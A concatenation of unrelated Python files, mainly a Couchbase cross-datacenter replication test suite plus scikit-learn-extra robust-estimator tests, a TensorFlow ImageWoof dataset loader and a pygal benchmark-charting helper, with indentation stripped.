tasks += self.dest_cluster.async_create_views(ddoc_name, views, BUCKET_NAME.DEFAULT)
for task in tasks:
task.result(self._poll_timeout)
self.src_cluster.disable_compaction()
fragmentation_monitor = self.src_cluster.async_monitor_view_fragmentation(prefix + ddoc_name, fragmentation_value, BUCKET_NAME.DEFAULT)
# generate load until fragmentation reached
while fragmentation_monitor.state != "FINISHED":
# update docs to create fragmentation
self.src_cluster.update_delete_data(OPS.UPDATE)
for view in views:
# run queries to create indexes
self.src_cluster.query_view(prefix + ddoc_name, view.name, query)
self.dest_cluster.query_view(prefix + ddoc_name, view.name, query)
fragmentation_monitor.result()
compaction_task = self.src_cluster.async_compact_view(prefix + ddoc_name, 'default')
self.assertTrue(compaction_task.result())
self.verify_results()
def replication_with_view_queries_and_ops(self):
bucket_type = self._input.param("bucket_type", "membase")
if bucket_type == "ephemeral":
self.log.info("Test case does not apply to ephemeral")
return
tasks = []
try:
self.setup_xdcr()
self.src_cluster.load_all_buckets(self._num_items)
self.dest_cluster.load_all_buckets(self._num_items)
num_views = self._input.param("num_views", 5)
is_dev_ddoc = self._input.param("is_dev_ddoc", True)
for bucket in self.src_cluster.get_buckets():
views = Utility.make_default_views(bucket.name, num_views, is_dev_ddoc)
ddoc_name = "ddoc1"
prefix = ("", "dev_")[is_dev_ddoc]
query = {"full_set": "true", "stale": "false", "connection_timeout": 60000}
tasks = self.src_cluster.async_create_views(ddoc_name, views, BUCKET_NAME.DEFAULT)
tasks += self.dest_cluster.async_create_views(ddoc_name, views, BUCKET_NAME.DEFAULT)
for task in tasks:
task.result(self._poll_timeout)
tasks = []
# Setting up doc-ops at source nodes
if "C1" in self._upd_clusters:
tasks.extend(self.src_cluster.async_update_delete(OPS.UPDATE, self._perc_upd, self._expires))
if "C1" in self._del_clusters:
tasks.extend(self.src_cluster.async_update_delete(OPS.DELETE, self._perc_del))
if "C2" in self._upd_clusters:
tasks.extend(self.dest_cluster.async_update_delete(OPS.UPDATE, self._perc_upd, self._expires))
if "C2" in self._del_clusters:
tasks.extend(self.dest_cluster.async_update_delete(OPS.DELETE, self._perc_del))
self.sleep(5)
while True:
for view in views:
self.src_cluster.query_view(prefix + ddoc_name, view.name, query)
self.dest_cluster.query_view(prefix + ddoc_name, view.name, query)
if {task.state for task in tasks} != {"FINISHED"}:
continue
else:
if self._wait_for_expiration:
if "C1" in self._upd_clusters or "C2" in self._upd_clusters:
self.sleep(self._expires)
break
self.merge_all_buckets()
self.src_cluster.verify_items_count()
self.dest_cluster.verify_items_count()
tasks = []
src_buckets = self.src_cluster.get_buckets()
dest_buckets = self.dest_cluster.get_buckets()
for view in views:
tasks.append(self.src_cluster.async_query_view(prefix + ddoc_name, view.name, query, src_buckets[0].kvs[1].__len__()))
tasks.append(self.dest_cluster.async_query_view(prefix + ddoc_name, view.name, query, dest_buckets[0].kvs[1].__len__()))
for task in tasks:
task.result(self._poll_timeout)
self.verify_results()
finally:
# For timeout error, all tasks to be cancelled
# Before proceeding to next test
for task in tasks:
task.cancel()
"""Replication with disabled/enabled ddoc compaction on both clusters.
This test begins by loading a given number of items on both clusters.
Then we disabled or enabled compaction on both clusters( set via params).
Then we mutate and delete data on clusters 3 times. After deletion we recreate
deleted items. When data was changed 3 times we perform
a full verification: wait for the disk queues to drain
and then verify that there has been no data loss on both clusters."""
def replication_with_disabled_ddoc_compaction(self):
self.setup_xdcr()
self.src_cluster.load_all_buckets(self._num_items)
self.dest_cluster.load_all_buckets(self._num_items)
if "C1" in self._disable_compaction:
self.src_cluster.disable_compaction()
if "C2" in self._disable_compaction:
self.dest_cluster.disable_compaction()
# perform doc's ops 3 times to increase rev number
for _ in range(3):
self.async_perform_update_delete()
# wait till deletes have been sent to recreate
self.sleep(60)
# restore(re-creating) deleted items
if 'C1' in self._del_clusters:
c1_kv_gen = self.src_cluster.get_kv_gen()
c1_gen_delete = copy.deepcopy(c1_kv_gen[OPS.DELETE])
if self._expires:
# if expiration set, recreate those keys before
# trying to update
c1_gen_update = copy.deepcopy(c1_kv_gen[OPS.UPDATE])
self.src_cluster.load_all_buckets_from_generator(kv_gen=c1_gen_update)
self.src_cluster.load_all_buckets_from_generator(kv_gen=c1_gen_delete)
if 'C2' in self._del_clusters:
c2_kv_gen = self.dest_cluster.get_kv_gen()
c2_gen_delete = copy.deepcopy(c2_kv_gen[OPS.DELETE])
if self._expires:
c2_gen_update = copy.deepcopy(c2_kv_gen[OPS.UPDATE])
self.dest_cluster.load_all_buckets_from_generator(kv_gen=c2_gen_update)
self.dest_cluster.load_all_buckets_from_generator(kv_gen=c2_gen_delete)
# wait till we recreate deleted keys before we can delete/update
self.sleep(300)
self.verify_results()
def replication_while_rebooting_a_non_master_src_dest_node(self):
bucket_type = self._input.param("bucket_type", "membase")
if bucket_type == "ephemeral":
self.log.info("Test case does not apply to ephemeral")
return
self.setup_xdcr_and_load()
self.async_perform_update_delete()
self.sleep(self._wait_timeout)
reboot_node_dest = self.dest_cluster.reboot_one_node(self)
NodeHelper.wait_node_restarted(reboot_node_dest, self, wait_time=self._wait_timeout * 4, wait_if_warmup=True)
reboot_node_src = self.src_cluster.reboot_one_node(self)
NodeHelper.wait_node_restarted(reboot_node_src, self, wait_time=self._wait_timeout * 4, wait_if_warmup=True)
self.sleep(120)
ClusterOperationHelper.wait_for_ns_servers_or_assert([reboot_node_dest], self, wait_if_warmup=True)
ClusterOperationHelper.wait_for_ns_servers_or_assert([reboot_node_src], self, wait_if_warmup=True)
self.verify_results()
def test_disk_full(self):
self.setup_xdcr_and_load()
self.verify_results()
self.sleep(self._wait_timeout)
zip_file = "%s.zip" % (self._input.param("file_name", "collectInfo"))
try:
for node in [self.src_master, self.dest_master]:
self.shell = RemoteMachineShellConnection(node)
self.shell.execute_cbcollect_info(zip_file)
if self.shell.extract_remote_info().type.lower() != "windows":
command = "unzip %s" % (zip_file)
output, error = self.shell.execute_command(command)
self.shell.log_command_output(output, error)
if len(error) > 0:
raise Exception("unable to unzip the files. Check unzip command output for help")
cmd = 'grep -R "Approaching full disk warning." cbcollect_info*/'
output, _ = self.shell.execute_command(cmd)
else:
cmd = "curl -0 http://{1}:{2}@{0}:8091/diag 2>/dev/null | grep 'Approaching full disk warning.'".format(
self.src_master.ip,
self.src_master.rest_username,
self.src_master.rest_password)
output, _ = self.shell.execute_command(cmd)
self.assertNotEqual(len(output), 0, "Full disk warning not generated as expected in %s" % node.ip)
self.log.info("Full disk warning generated as expected in %s" % node.ip)
self.shell.delete_files(zip_file)
self.shell.delete_files("cbcollect_info*")
except Exception as e:
self.log.info(e)
def test_rollback(self):
bucket = self.src_cluster.get_buckets()[0]
src_nodes = self.src_cluster.get_nodes()
dest_nodes = self.dest_cluster.get_nodes()
nodes = src_nodes + dest_nodes
# Stop Persistence on Node A & Node B
for node in nodes:
mem_client = MemcachedClientHelper.direct_client(node, bucket)
mem_client.stop_persistence()
goxdcr_log = NodeHelper.get_goxdcr_log_dir(self._input.servers[0])\
+ '/goxdcr.log*'
self.setup_xdcr()
self.src_cluster.pause_all_replications()
self.dest_cluster.pause_all_replications()
gen = BlobGenerator("C1-", "C1-", self._value_size, end=self._num_items)
self.src_cluster.load_all_buckets_from_generator(gen)
gen = BlobGenerator("C2-", "C2-", self._value_size, end=self._num_items)
self.dest_cluster.load_all_buckets_from_generator(gen)
self.src_cluster.resume_all_replications()
self.dest_cluster.resume_all_replications()
# Perform mutations on the bucket
self.async_perform_update_delete()
rest1 = RestConnection(self.src_cluster.get_master_node())
rest2 = RestConnection(self.dest_cluster.get_master_node())
# Fetch count of docs in src and dest cluster
_count1 = rest1.fetch_bucket_stats(bucket=bucket.name)["op"]["samples"]["curr_items"][-1]
_count2 = rest2.fetch_bucket_stats(bucket=bucket.name)["op"]["samples"]["curr_items"][-1]
self.log.info("Before rollback src cluster count = {0} dest cluster count = {1}".format(_count1, _count2))
# Kill memcached on Node A so that Node B becomes master
shell = RemoteMachineShellConnection(self.src_cluster.get_master_node())
shell.kill_memcached()
shell = RemoteMachineShellConnection(self.dest_cluster.get_master_node())
shell.kill_memcached()
# Start persistence on Node B
mem_client = MemcachedClientHelper.direct_client(src_nodes[1], bucket)
mem_client.start_persistence()
mem_client = MemcachedClientHelper.direct_client(dest_nodes[1], bucket)
mem_client.start_persistence()
# Failover Node B
failover_task = self.src_cluster.async_failover()
failover_task.result()
failover_task = self.dest_cluster.async_failover()
failover_task.result()
# Wait for Failover & rollback to complete
self.sleep(60)
# Fetch count of docs in src and dest cluster
_count1 = rest1.fetch_bucket_stats(bucket=bucket.name)["op"]["samples"]["curr_items"][-1]
_count2 = rest2.fetch_bucket_stats(bucket=bucket.name)["op"]["samples"]["curr_items"][-1]
self.log.info("After rollback src cluster count = {0} dest cluster count = {1}".format(_count1, _count2))
self.assertTrue(self.src_cluster.wait_for_outbound_mutations(),
"Mutations in source cluster not replicated to target after rollback")
self.assertTrue(self.dest_cluster.wait_for_outbound_mutations(),
"Mutations in target cluster not replicated to source after rollback")
_, count = NodeHelper.check_goxdcr_log(
src_nodes[0],
"Received rollback from DCP stream",
goxdcr_log)
self.assertGreater(count, 0, "rollback did not happen as expected")
self.log.info("rollback happened as expected")
_, count = NodeHelper.check_goxdcr_log(
dest_nodes[0],
"Received rollback from DCP stream",
goxdcr_log)
self.assertGreater(count, 0, "rollback did not happen as expected")
self.log.info("rollback happened as expected")
def test_scramsha(self):
"""
Creates a new bi-xdcr replication with scram-sha
Make sure to pass use-scramsha=True
from command line
"""
self.setup_xdcr()
self.sleep(60, "wait before checking logs")
for node in [self.src_cluster.get_master_node()]+[self.dest_cluster.get_master_node()]:
_, count = NodeHelper.check_goxdcr_log(node,
"HttpAuthMech=ScramSha for remote cluster reference remoteCluster", timeout=60)
if count <= 0:
self.fail("Node {0} does not use SCRAM-SHA authentication".format(node.ip))
else:
self.log.info("SCRAM-SHA auth successful on node {0}".format(node.ip))
self.verify_results()
def test_update_to_scramsha_auth(self):
"""
Start with ordinary replication, then switch to use scram_sha_auth
Search for success log stmtsS
"""
_, old_count = NodeHelper.check_goxdcr_log(self.src_cluster.get_master_node(),
"HttpAuthMech=ScramSha for remote cluster reference remoteCluster", timeout=60)
self.setup_xdcr()
# modify remote cluster ref to use scramsha
for remote_cluster in self.src_cluster.get_remote_clusters()+self.dest_cluster.get_remote_clusters():
remote_cluster.use_scram_sha_auth()
self.sleep(60, "wait before checking the logs for using scram-sha")
for node in [self.src_cluster.get_master_node()]+[self.dest_cluster.get_master_node()]:
_, count = NodeHelper.check_goxdcr_log(node, "HttpAuthMech=ScramSha for remote cluster reference remoteCluster", timeout=60)
if count <= old_count:
self.fail("Node {0} does not use SCRAM-SHA authentication".format(node.ip))
else:
self.log.info("SCRAM-SHA auth successful on node {0}".format(node.ip))
self.verify_results()
|
1708269
|
from django.conf import settings
from rest_framework import serializers
class SearchHashtagsSerializer(serializers.Serializer):
query = serializers.CharField(max_length=settings.SEARCH_QUERIES_MAX_LENGTH, required=True)
count = serializers.IntegerField(
required=False,
max_value=10
)
|
1708322
|
import numpy as np
import pytest
from sklearn_extra.robust import (
RobustWeightedClassifier,
RobustWeightedRegressor,
RobustWeightedKMeans,
)
from sklearn.datasets import make_blobs
from sklearn.linear_model import SGDClassifier, SGDRegressor, HuberRegressor
from sklearn.cluster import KMeans
from sklearn.utils import shuffle
from sklearn.metrics import r2_score
from sklearn.utils._testing import (
assert_array_almost_equal,
assert_almost_equal,
)
# Check the sklearn version: in versions older than v1.0, "squared_loss" must be used
import sklearn
if sklearn.__version__[0] == "0":
SQ_LOSS = "squared_loss"
else:
SQ_LOSS = "squared_error"
k_values = [None, 10] # values of k for test robust
c_values = [None, 1e-3] # values of c for test robust
# Classification test with outliers
rng = np.random.RandomState(42)
X_cc, y_cc = make_blobs(
n_samples=100,
centers=np.array([[-1, -1], [1, 1]]),
random_state=rng,
)
for f in range(3):
X_cc[f] = [10, 5] + rng.normal(size=2) * 0.1
y_cc[f] = 0
classif_losses = ["log", "hinge"]
weightings = ["huber", "mom"]
multi_class = ["ovr", "ovo"]
def test_robust_estimator_max_iter():
"""Test that warning message is thrown when max_iter is reached."""
model = RobustWeightedClassifier(max_iter=1)
msg = "Maximum number of iteration reached before"
with pytest.warns(UserWarning, match=msg):
model.fit(X_cc, y_cc)
def test_robust_estimator_unsupported_loss():
"""Test that warning message is thrown when unsupported loss."""
model = RobustWeightedClassifier(loss="invalid")
msg = "The loss invalid is not supported. "
with pytest.raises(ValueError, match=msg):
model.fit(X_cc, y_cc)
def test_robust_estimator_unsupported_weighting():
"""Test that warning message is thrown when unsupported weighting."""
model = RobustWeightedClassifier(weighting="invalid")
msg = "No such weighting scheme"
with pytest.raises(ValueError, match=msg):
model.fit(X_cc, y_cc)
def test_robust_estimator_unsupported_multiclass():
"""Test that warning message is thrown when unsupported weighting."""
model = RobustWeightedClassifier(multi_class="invalid")
msg = "No such multiclass method implemented."
with pytest.raises(ValueError, match=msg):
model.fit(X_cc, y_cc)
def test_robust_estimator_input_validation_and_fit_check():
# Invalid parameters
msg = "max_iter must be > 0, got 0."
with pytest.raises(ValueError, match=msg):
RobustWeightedKMeans(max_iter=0).fit(X_cc)
msg = "c must be > 0, got 0."
with pytest.raises(ValueError, match=msg):
RobustWeightedKMeans(c=0).fit(X_cc)
msg = "burn_in must be >= 0, got -1."
with pytest.raises(ValueError, match=msg):
RobustWeightedClassifier(burn_in=-1).fit(X_cc, y_cc)
msg = "eta0 must be > 0, got 0."
with pytest.raises(ValueError, match=msg):
RobustWeightedClassifier(burn_in=1, eta0=0).fit(X_cc, y_cc)
msg = "k must be integer >= 0, and smaller than floor"
with pytest.raises(ValueError, match=msg):
RobustWeightedKMeans(k=-1).fit(X_cc)
@pytest.mark.parametrize("loss", classif_losses)
@pytest.mark.parametrize("weighting", weightings)
@pytest.mark.parametrize("k", k_values)
@pytest.mark.parametrize("c", c_values)
@pytest.mark.parametrize("multi_class", multi_class)
def test_corrupted_classif(loss, weighting, k, c, multi_class):
clf = RobustWeightedClassifier(
loss=loss,
max_iter=100,
weighting=weighting,
k=k,
c=c,
multi_class=multi_class,
random_state=rng,
)
clf.fit(X_cc, y_cc)
score = clf.score(X_cc, y_cc)
assert score > 0.8
# Classification test without outliers
rng = np.random.RandomState(42)
X_c, y_c = make_blobs(
n_samples=100,
centers=np.array([[-1, -1], [1, 1], [3, -1]]),
random_state=rng,
)
# check that multi_class="binary" raises an error when y is not binary
def test_robust_estimator_binary_requires_binary_y():
model = RobustWeightedClassifier(multi_class="binary")
msg = "y must be binary."
with pytest.raises(ValueError, match=msg):
model.fit(X_c, y_c)
# Check that the fit is close to SGD when in extremal parameter cases
@pytest.mark.parametrize("loss", classif_losses)
@pytest.mark.parametrize("weighting", weightings)
@pytest.mark.parametrize("multi_class", multi_class)
def test_not_robust_classif(loss, weighting, multi_class):
clf = RobustWeightedClassifier(
loss=loss,
max_iter=100,
weighting=weighting,
k=0,
c=1e7,
burn_in=0,
multi_class=multi_class,
random_state=rng,
)
clf_not_rob = SGDClassifier(loss=loss, random_state=rng)
clf.fit(X_c, y_c)
clf_not_rob.fit(X_c, y_c)
pred1 = clf.predict(X_c)
pred2 = clf_not_rob.predict(X_c)
assert np.mean((pred1 > 0) == (pred2 > 0)) > 0.8
assert clf.score(X_c, y_c) == np.mean(pred1 == y_c)
# Make binary uncorrupted dataset
X_cb, y_cb = make_blobs(
n_samples=100, centers=np.array([[-1, -1], [1, 1]]), random_state=rng
)
@pytest.mark.parametrize("weighting", weightings)
def test_classif_binary(weighting):
clf = RobustWeightedClassifier(
max_iter=100,
weighting=weighting,
k=0,
c=1e7,
burn_in=0,
multi_class="binary",
random_state=rng,
)
clf_not_rob = SGDClassifier(loss="log", random_state=rng)
clf.fit(X_cb, y_cb)
clf_not_rob.fit(X_cb, y_cb)
norm_coef1 = np.linalg.norm(np.hstack([clf.coef_.ravel(), clf.intercept_]))
norm_coef2 = np.linalg.norm(
np.hstack([clf_not_rob.coef_.ravel(), clf_not_rob.intercept_])
)
coef1 = clf.coef_ / norm_coef1
coef2 = clf_not_rob.coef_ / norm_coef2
intercept1 = clf.intercept_ / norm_coef1
intercept2 = clf_not_rob.intercept_ / norm_coef2
assert np.linalg.norm(coef1 - coef2) < 0.5
assert np.linalg.norm(intercept1 - intercept2) < 0.5
assert len(clf.weights_) == len(X_cb)
# Check that weights_ parameter can be used as outlier score.
@pytest.mark.parametrize("weighting", weightings)
def test_classif_corrupted_weights(weighting):
clf = RobustWeightedClassifier(
max_iter=100,
weighting=weighting,
k=5,
c=1,
burn_in=0,
multi_class="binary",
random_state=rng,
)
clf.fit(X_cc, y_cc)
assert np.mean(clf.weights_[:3]) < np.mean(clf.weights_[3:])
# Case "log" loss, test predict_proba
@pytest.mark.parametrize("weighting", weightings)
def test_predict_proba(weighting):
clf = RobustWeightedClassifier(
max_iter=100,
weighting=weighting,
k=0,
c=1e7,
burn_in=0,
random_state=rng,
)
clf_not_rob = SGDClassifier(loss="log", random_state=rng)
clf.fit(X_c, y_c)
clf_not_rob.fit(X_c, y_c)
pred1 = clf.base_estimator_.predict_proba(X_c)[:, 1]
pred2 = clf_not_rob.predict_proba(X_c)[:, 1]
assert np.mean((pred1 > 1 / 2) == (pred2 > 1 / 2)) > 0.8
# check that classifier with another loss than log raises an error
def test_robust_no_proba():
est = RobustWeightedClassifier(loss="hinge").fit(X_c, y_c)
msg = "Probability estimates are not available for loss='hinge'"
with pytest.raises(AttributeError, match=msg):
est.predict_proba(X_c)
# Regression test with outliers
X_rc = rng.uniform(-1, 1, size=[200])
y_rc = X_rc + 0.1 * rng.normal(size=200)
X_rc[0] = 10
X_rc = X_rc.reshape(-1, 1)
y_rc[0] = -1
regression_losses = [SQ_LOSS, "huber"]
@pytest.mark.parametrize("loss", regression_losses)
@pytest.mark.parametrize("weighting", weightings)
@pytest.mark.parametrize("k", k_values)
@pytest.mark.parametrize("c", c_values)
def test_corrupted_regression(loss, weighting, k, c):
reg = RobustWeightedRegressor(
loss=loss,
max_iter=50,
weighting=weighting,
k=k,
c=c,
random_state=rng,
n_iter_no_change=20,
)
reg.fit(X_rc, y_rc)
assert np.abs(reg.coef_[0] - 1) < 0.1
assert np.abs(reg.intercept_[0]) < 0.1
# Check that weights_ parameter can be used as outlier score.
@pytest.mark.parametrize("weighting", weightings)
def test_regression_corrupted_weights(weighting):
reg = RobustWeightedRegressor(
max_iter=100,
weighting=weighting,
k=5,
c=1,
burn_in=0,
random_state=rng,
)
reg.fit(X_rc, y_rc)
assert reg.weights_[0] < np.mean(reg.weights_[1:])
X_r = rng.uniform(-1, 1, size=[1000])
y_r = X_r + 0.1 * rng.normal(size=1000)
X_r = X_r.reshape(-1, 1)
# Check that the fit is close to SGD when in extremal parameter cases
@pytest.mark.parametrize("loss", regression_losses)
@pytest.mark.parametrize("weighting", weightings)
def test_not_robust_regression(loss, weighting):
reg = RobustWeightedRegressor(
loss=loss,
max_iter=100,
weighting=weighting,
k=0,
c=1e7,
burn_in=0,
random_state=rng,
)
reg_not_rob = SGDRegressor(loss=loss, random_state=rng)
reg.fit(X_r, y_r)
reg_not_rob.fit(X_r, y_r)
pred1 = reg.predict(X_r)
pred2 = reg_not_rob.predict(X_r)
difference = [
np.linalg.norm(pred1[i] - pred2[i]) for i in range(len(pred1))
]
assert np.mean(difference) < 1
assert_almost_equal(reg.score(X_r, y_r), r2_score(y_r, reg.predict(X_r)))
# Compare with HuberRegressor on dataset corrupted in y
X_rcy = rng.uniform(-1, 1, size=[200])
y_rcy = X_rcy + 0.1 * rng.normal(size=200)
X_rcy = X_rcy.reshape(-1, 1)
y_rcy[0] = -1
def test_vs_huber():
reg1 = RobustWeightedRegressor(
max_iter=100,
weighting="huber",
k=5,
c=1,
burn_in=0,
sgd_args={"learning_rate": "adaptive"}, # test sgd_args
random_state=rng,
)
reg2 = HuberRegressor()
reg1.fit(X_rcy, y_rcy)
reg2.fit(X_rcy, y_rcy)
assert np.abs(reg1.coef_[0] - reg2.coef_[0]) < 1e-2
# Clustering test with outliers
rng = np.random.RandomState(42)
X_clusterc, y_clusterc = make_blobs(
n_samples=100, centers=np.array([[-1, -1], [1, 1]]), random_state=rng
)
for f in range(3):
X_clusterc[f] = [20, 5] + rng.normal(size=2) * 0.1
y_clusterc[f] = 0
X_cluster, y_cluster = shuffle(X_clusterc, y_clusterc, random_state=rng)
weightings = ["huber", "mom"]
@pytest.mark.parametrize("weighting", weightings)
@pytest.mark.parametrize("k", k_values)
@pytest.mark.parametrize("c", c_values)
def test_corrupted_cluster(weighting, k, c):
km = RobustWeightedKMeans(
n_clusters=2,
max_iter=50,
weighting=weighting,
k=5,
c=None,
random_state=rng,
)
km.fit(X_clusterc)
error = np.mean((km.predict(X_clusterc) - y_clusterc) ** 2)
assert error < 100
# Clustering test without outliers
rng = np.random.RandomState(42)
X_cluster, y_cluster = make_blobs(
n_samples=100, centers=np.array([[-1, -1], [1, 1]]), random_state=rng
)
# Check that the fit is close to KMeans when in extremal parameter cases
@pytest.mark.parametrize("weighting", weightings)
def test_not_robust_cluster(weighting):
clf = RobustWeightedKMeans(
n_clusters=2,
max_iter=100,
weighting=weighting,
k=0,
c=1e7,
random_state=rng,
)
clf_not_rob = KMeans(2, random_state=rng)
clf.fit(X_cluster)
clf_not_rob.fit(X_cluster)
pred1 = [clf.cluster_centers_[i] for i in clf.predict(X_cluster)]
pred2 = [
clf_not_rob.cluster_centers_[i] for i in clf_not_rob.predict(X_cluster)
]
difference = [
np.linalg.norm(pred1[i] - pred2[i]) for i in range(len(pred1))
]
assert np.mean(difference) < 1
def test_transform():
n_clusters = 2
km = RobustWeightedKMeans(n_clusters=n_clusters, random_state=rng)
km.fit(X_cluster)
X_new = km.transform(km.cluster_centers_)
for c in range(n_clusters):
assert X_new[c, c] == 0
for c2 in range(n_clusters):
if c != c2:
assert X_new[c, c2] > 0
def test_fit_transform():
X1 = (
RobustWeightedKMeans(n_clusters=2, random_state=42)
.fit(X_cluster)
.transform(X_cluster)
)
X2 = RobustWeightedKMeans(n_clusters=2, random_state=42).fit_transform(
X_cluster
)
assert_array_almost_equal(X1, X2)
|
1708330
|
from io import StringIO
from snowfakery.data_generator import generate
class TestFriends:
def test_multiple_friends(self, generated_rows):
yaml = """
- object: Account
- object: Account
friends:
- object: Contact
fields:
AccountId:
reference: Account
- object: Contact
fields:
AccountId:
reference: Account
"""
generate(StringIO(yaml), {})
assert generated_rows.table_values("Contact", 0, "AccountId") == "Account(2)"
assert generated_rows.table_values("Contact", 1, "AccountId") == "Account(2)"
|
1708368
|
from __future__ import absolute_import, division, print_function, unicode_literals
import os
import pathlib
import typing
from typing import TYPE_CHECKING
import numpy as np
if TYPE_CHECKING: # pragma: no cover
import tensorflow as _tf
try:
import tensorflow as tf
assert tf.__version__[:2] == "2."
except ImportError:
raise ImportError(
'This dataset requires tensorflow 2! Locally you can install it with "conda install tensorflow>=2.0.0" or "pip install tensorflow>=2.0.0"'
)
except AssertionError:
raise ImportError(
'This dataset requires tensorflow 2! In Colab you can force this with the "%tensorflow_version 2.x" command. Afterwards you have to restart the runtime. For reference, have another look at the example notebooks from this week!'
)
AUTOTUNE = tf.data.experimental.AUTOTUNE
"""
The imagewoof dataset is provided by FastAI
author = "<NAME>",
title = "imagenette",
url = "https://github.com/fastai/imagenette/"
"""
ImageWoofType = typing.TypeVar("ImageWoofType", bound="ImageWoof")
class ImageWoof:
BATCH_SIZE: int = 32
CLASS_NAMES: np.ndarray = None
data_dir: pathlib.Path
image_count: int = 0
list_ds: "_tf.data.Dataset" = None
def __init__(self, dataset: str) -> None:
if dataset not in ["train", "val"]:
raise ValueError("Dataset not found")
file_path = tf.keras.utils.get_file(
origin="https://s3.amazonaws.com/fast-ai-imageclas/imagewoof2-320.tgz",
fname="imagewoof",
untar=True,
)
self.data_dir = pathlib.Path(file_path + "2-320/" + dataset)
print(self.data_dir)
self.image_count = len(list(self.data_dir.glob("*/*.JPEG")))
print(f"Loaded {self.image_count} images")
self.raw_class_names = [
item.name for item in self.data_dir.glob("*") if item.name != "LICENSE.txt"
]
self.raw_class_names.sort()
self.class_name_mapping = dict(
n02096294="Australian terrier",
n02093754="Border terrier",
n02111889="Samoyed",
n02088364="Beagle",
n02086240="Shih-Tzu",
n02089973="English foxhound",
n02087394="Rhodesian ridgeback",
n02115641="Dingo",
n02099601="Golden retriever",
n02105641="Old English sheepdog",
)
self.CLASS_NAMES = np.array([self.map_class(c) for c in self.raw_class_names])
self.list_ds = tf.data.Dataset.list_files(str(self.data_dir / "*/*"))
@classmethod
def train(cls: typing.Type[ImageWoofType]) -> ImageWoofType:
return cls("train")
@classmethod
def validation(cls: typing.Type[ImageWoofType]) -> ImageWoofType:
return cls("val")
def map_class(self, raw_cls: str) -> str:
return self.class_name_mapping[raw_cls]
def get_label(self, file_path: str) -> "_tf.Tensor":
# convert the path to a list of path components
parts = tf.strings.split(file_path, os.path.sep)
# The second to last is the class-directory
label = parts[-2] == self.raw_class_names
label = tf.reduce_sum(tf.where(label))
return label
def decode_img(self, img: "_tf.Tensor") -> "_tf.Tensor":
# convert the compressed string to a 3D uint8 tensor
img = tf.image.decode_jpeg(img, channels=3)
# Use `convert_image_dtype` to convert to floats in the [0,1] range.
return tf.image.convert_image_dtype(img, tf.float32)
def process_path(self, file_path: str) -> typing.Tuple["_tf.Tensor", str]:
label = self.get_label(file_path)
# load the raw data from the file as a string
img: "_tf.Tensor" = tf.io.read_file(file_path)
img = self.decode_img(img)
return img, label
def wrapped_load_data(self) -> "_tf.data.Dataset":
return self.list_ds.map(self.process_path, num_parallel_calls=AUTOTUNE)
@classmethod
def load_data(
cls: typing.Type[ImageWoofType],
) -> typing.Tuple["_tf.data.Dataset", "_tf.data.Dataset", np.ndarray]:
train_ds = cls.train()
return (
train_ds.wrapped_load_data(),
cls.validation().wrapped_load_data(),
train_ds.CLASS_NAMES,
)
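# A minimal usage sketch (illustrative, not part of the original module; calling
# load_data() triggers the dataset download via tf.keras.utils.get_file):
#
#   train_ds, val_ds, class_names = ImageWoof.load_data()
#   train_ds = train_ds.shuffle(1000).batch(ImageWoof.BATCH_SIZE).prefetch(AUTOTUNE)
#   for images, labels in train_ds.take(1):
#       print(images.shape, class_names[labels[0].numpy()])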
|
1708378
|
import numpy as np
from mcfly.models.base_hyperparameter_generator import generate_base_hyperparameter_set, \
get_regularization
def test_regularization_is_float():
""" Regularization should be a float. """
reg = get_regularization(0, 5)
    assert isinstance(reg, float), "Expected different type."
def test_regularization_0size_interval():
""" Regularization from zero size interval [2,2] should be 10^-2. """
reg = get_regularization(2, 2)
assert reg == 0.01
def test_base_hyper_parameters_reg():
""" Base hyper parameter set should contain regularization. """
hyper_parameter_set = generate_base_hyperparameter_set(low_lr=1,
high_lr=4,
low_reg=1,
high_reg=3)
assert 'regularization_rate' in hyper_parameter_set.keys()
|
1708456
|
import os
import sys
import re
import operator
import json
from commands import getoutput
from collections import defaultdict
import py
from dotmap import DotMap
import pygal
try:
# see GroupedBarChart.get_point for why it's needed
import scipy
except ImportError:
scipy = None
class SecondsFormatter(pygal.formatters.HumanReadable):
def __call__(self, val):
val = super(SecondsFormatter, self).__call__(val)
if not val[-1].isdigit():
val = val[:-1] + ' ' + val[-1]
return val + 's'
def format_point(b, point):
rev = b.info.commit_info.id
url = 'https://github.com/antocuni/capnpy/commit/%s' % rev
point.update({
'label': '%s %s' % (b.name, rev[:7]),
'xlink': {
'href': url,
'target': '_blank'
}
})
return point
class GroupedBarChart(object):
"""
Helper class to build a pygal Bar chart with groups.
Each data point has two property:
- series_name: each series gets a different color and it's shown in the
legend
- group: the bars belonging to each group are located together, and the
name of the group is shown on the X axis
"""
def __init__(self, title):
self.title = title
self.all_series = set()
self.all_groups = set()
self.data = {} # [(series_name, group)] -> point
def get_point(self, b):
point = {'value': b.stats.mean}
if scipy:
# scipy is needed to compute confidence intervals; however, if
# it's not installed we don't want pygal to crash.
point['ci'] = {
'type': 'continuous',
'sample_size': b.stats.rounds,
'stddev': b.stats.stddev
}
return format_point(b, point)
def add(self, series_name, group, b):
self.all_series.add(series_name)
self.all_groups.add(group)
key = (series_name, group)
if key in self.data:
raise ValueError("Duplicate key: %s" % (key,))
self.data[(series_name, group)] = self.get_point(b)
def build(self):
chart = pygal.Bar(pretty_print=True)
chart.config.value_formatter = SecondsFormatter()
chart.y_title = 'Time'
chart.title = self.title
series_names = sorted(self.all_series)
groups = sorted(self.all_groups)
chart.x_labels = groups
for name in series_names:
series = [self.data.get((name, group), None)
for group in groups]
chart.add(name, series)
return chart
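# Minimal usage sketch (hypothetical benchmark objects, not part of this script):
# each (series_name, group) pair becomes one bar; bars sharing a group are drawn
# together and the group name is shown on the X axis.
#
#   chart = GroupedBarChart('Timings')
#   chart.add('CPython', 'load', bench_cpython_load)
#   chart.add('PyPy', 'load', bench_pypy_load)
#   chart.add('CPython', 'dump', bench_cpython_dump)
#   svg = chart.build().render()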
class TimelineChart(object):
def __init__(self, title):
self.title = title
self.data = defaultdict(dict)
self.min = float('inf')
self.max = float('-inf')
self.all_revisions = []
def get_point(self, b):
point = {'value': b.stats.min}
return format_point(b, point)
def add(self, series_name, group, b):
assert group is None
rev = b.info.commit_info.id
if rev not in self.all_revisions:
# XXX: to get correct results, we need that all_revisions contains
# the commits in the correct order. Here, we are relying on the
# fact that we sort() the json files before loading them, so .add
# will see the revisions in chronological order. Probably, it
# would be better to do a proper topological sort of revisions
# without relying on the order of json loading
self.all_revisions.append(rev)
p = self.get_point(b)
self.data[series_name][rev] = p
self.min = min(self.min, p['value'])
self.max = max(self.max, p['value'])
def build(self):
chart = pygal.Line()
chart.title = self.title
chart.config.value_formatter = SecondsFormatter()
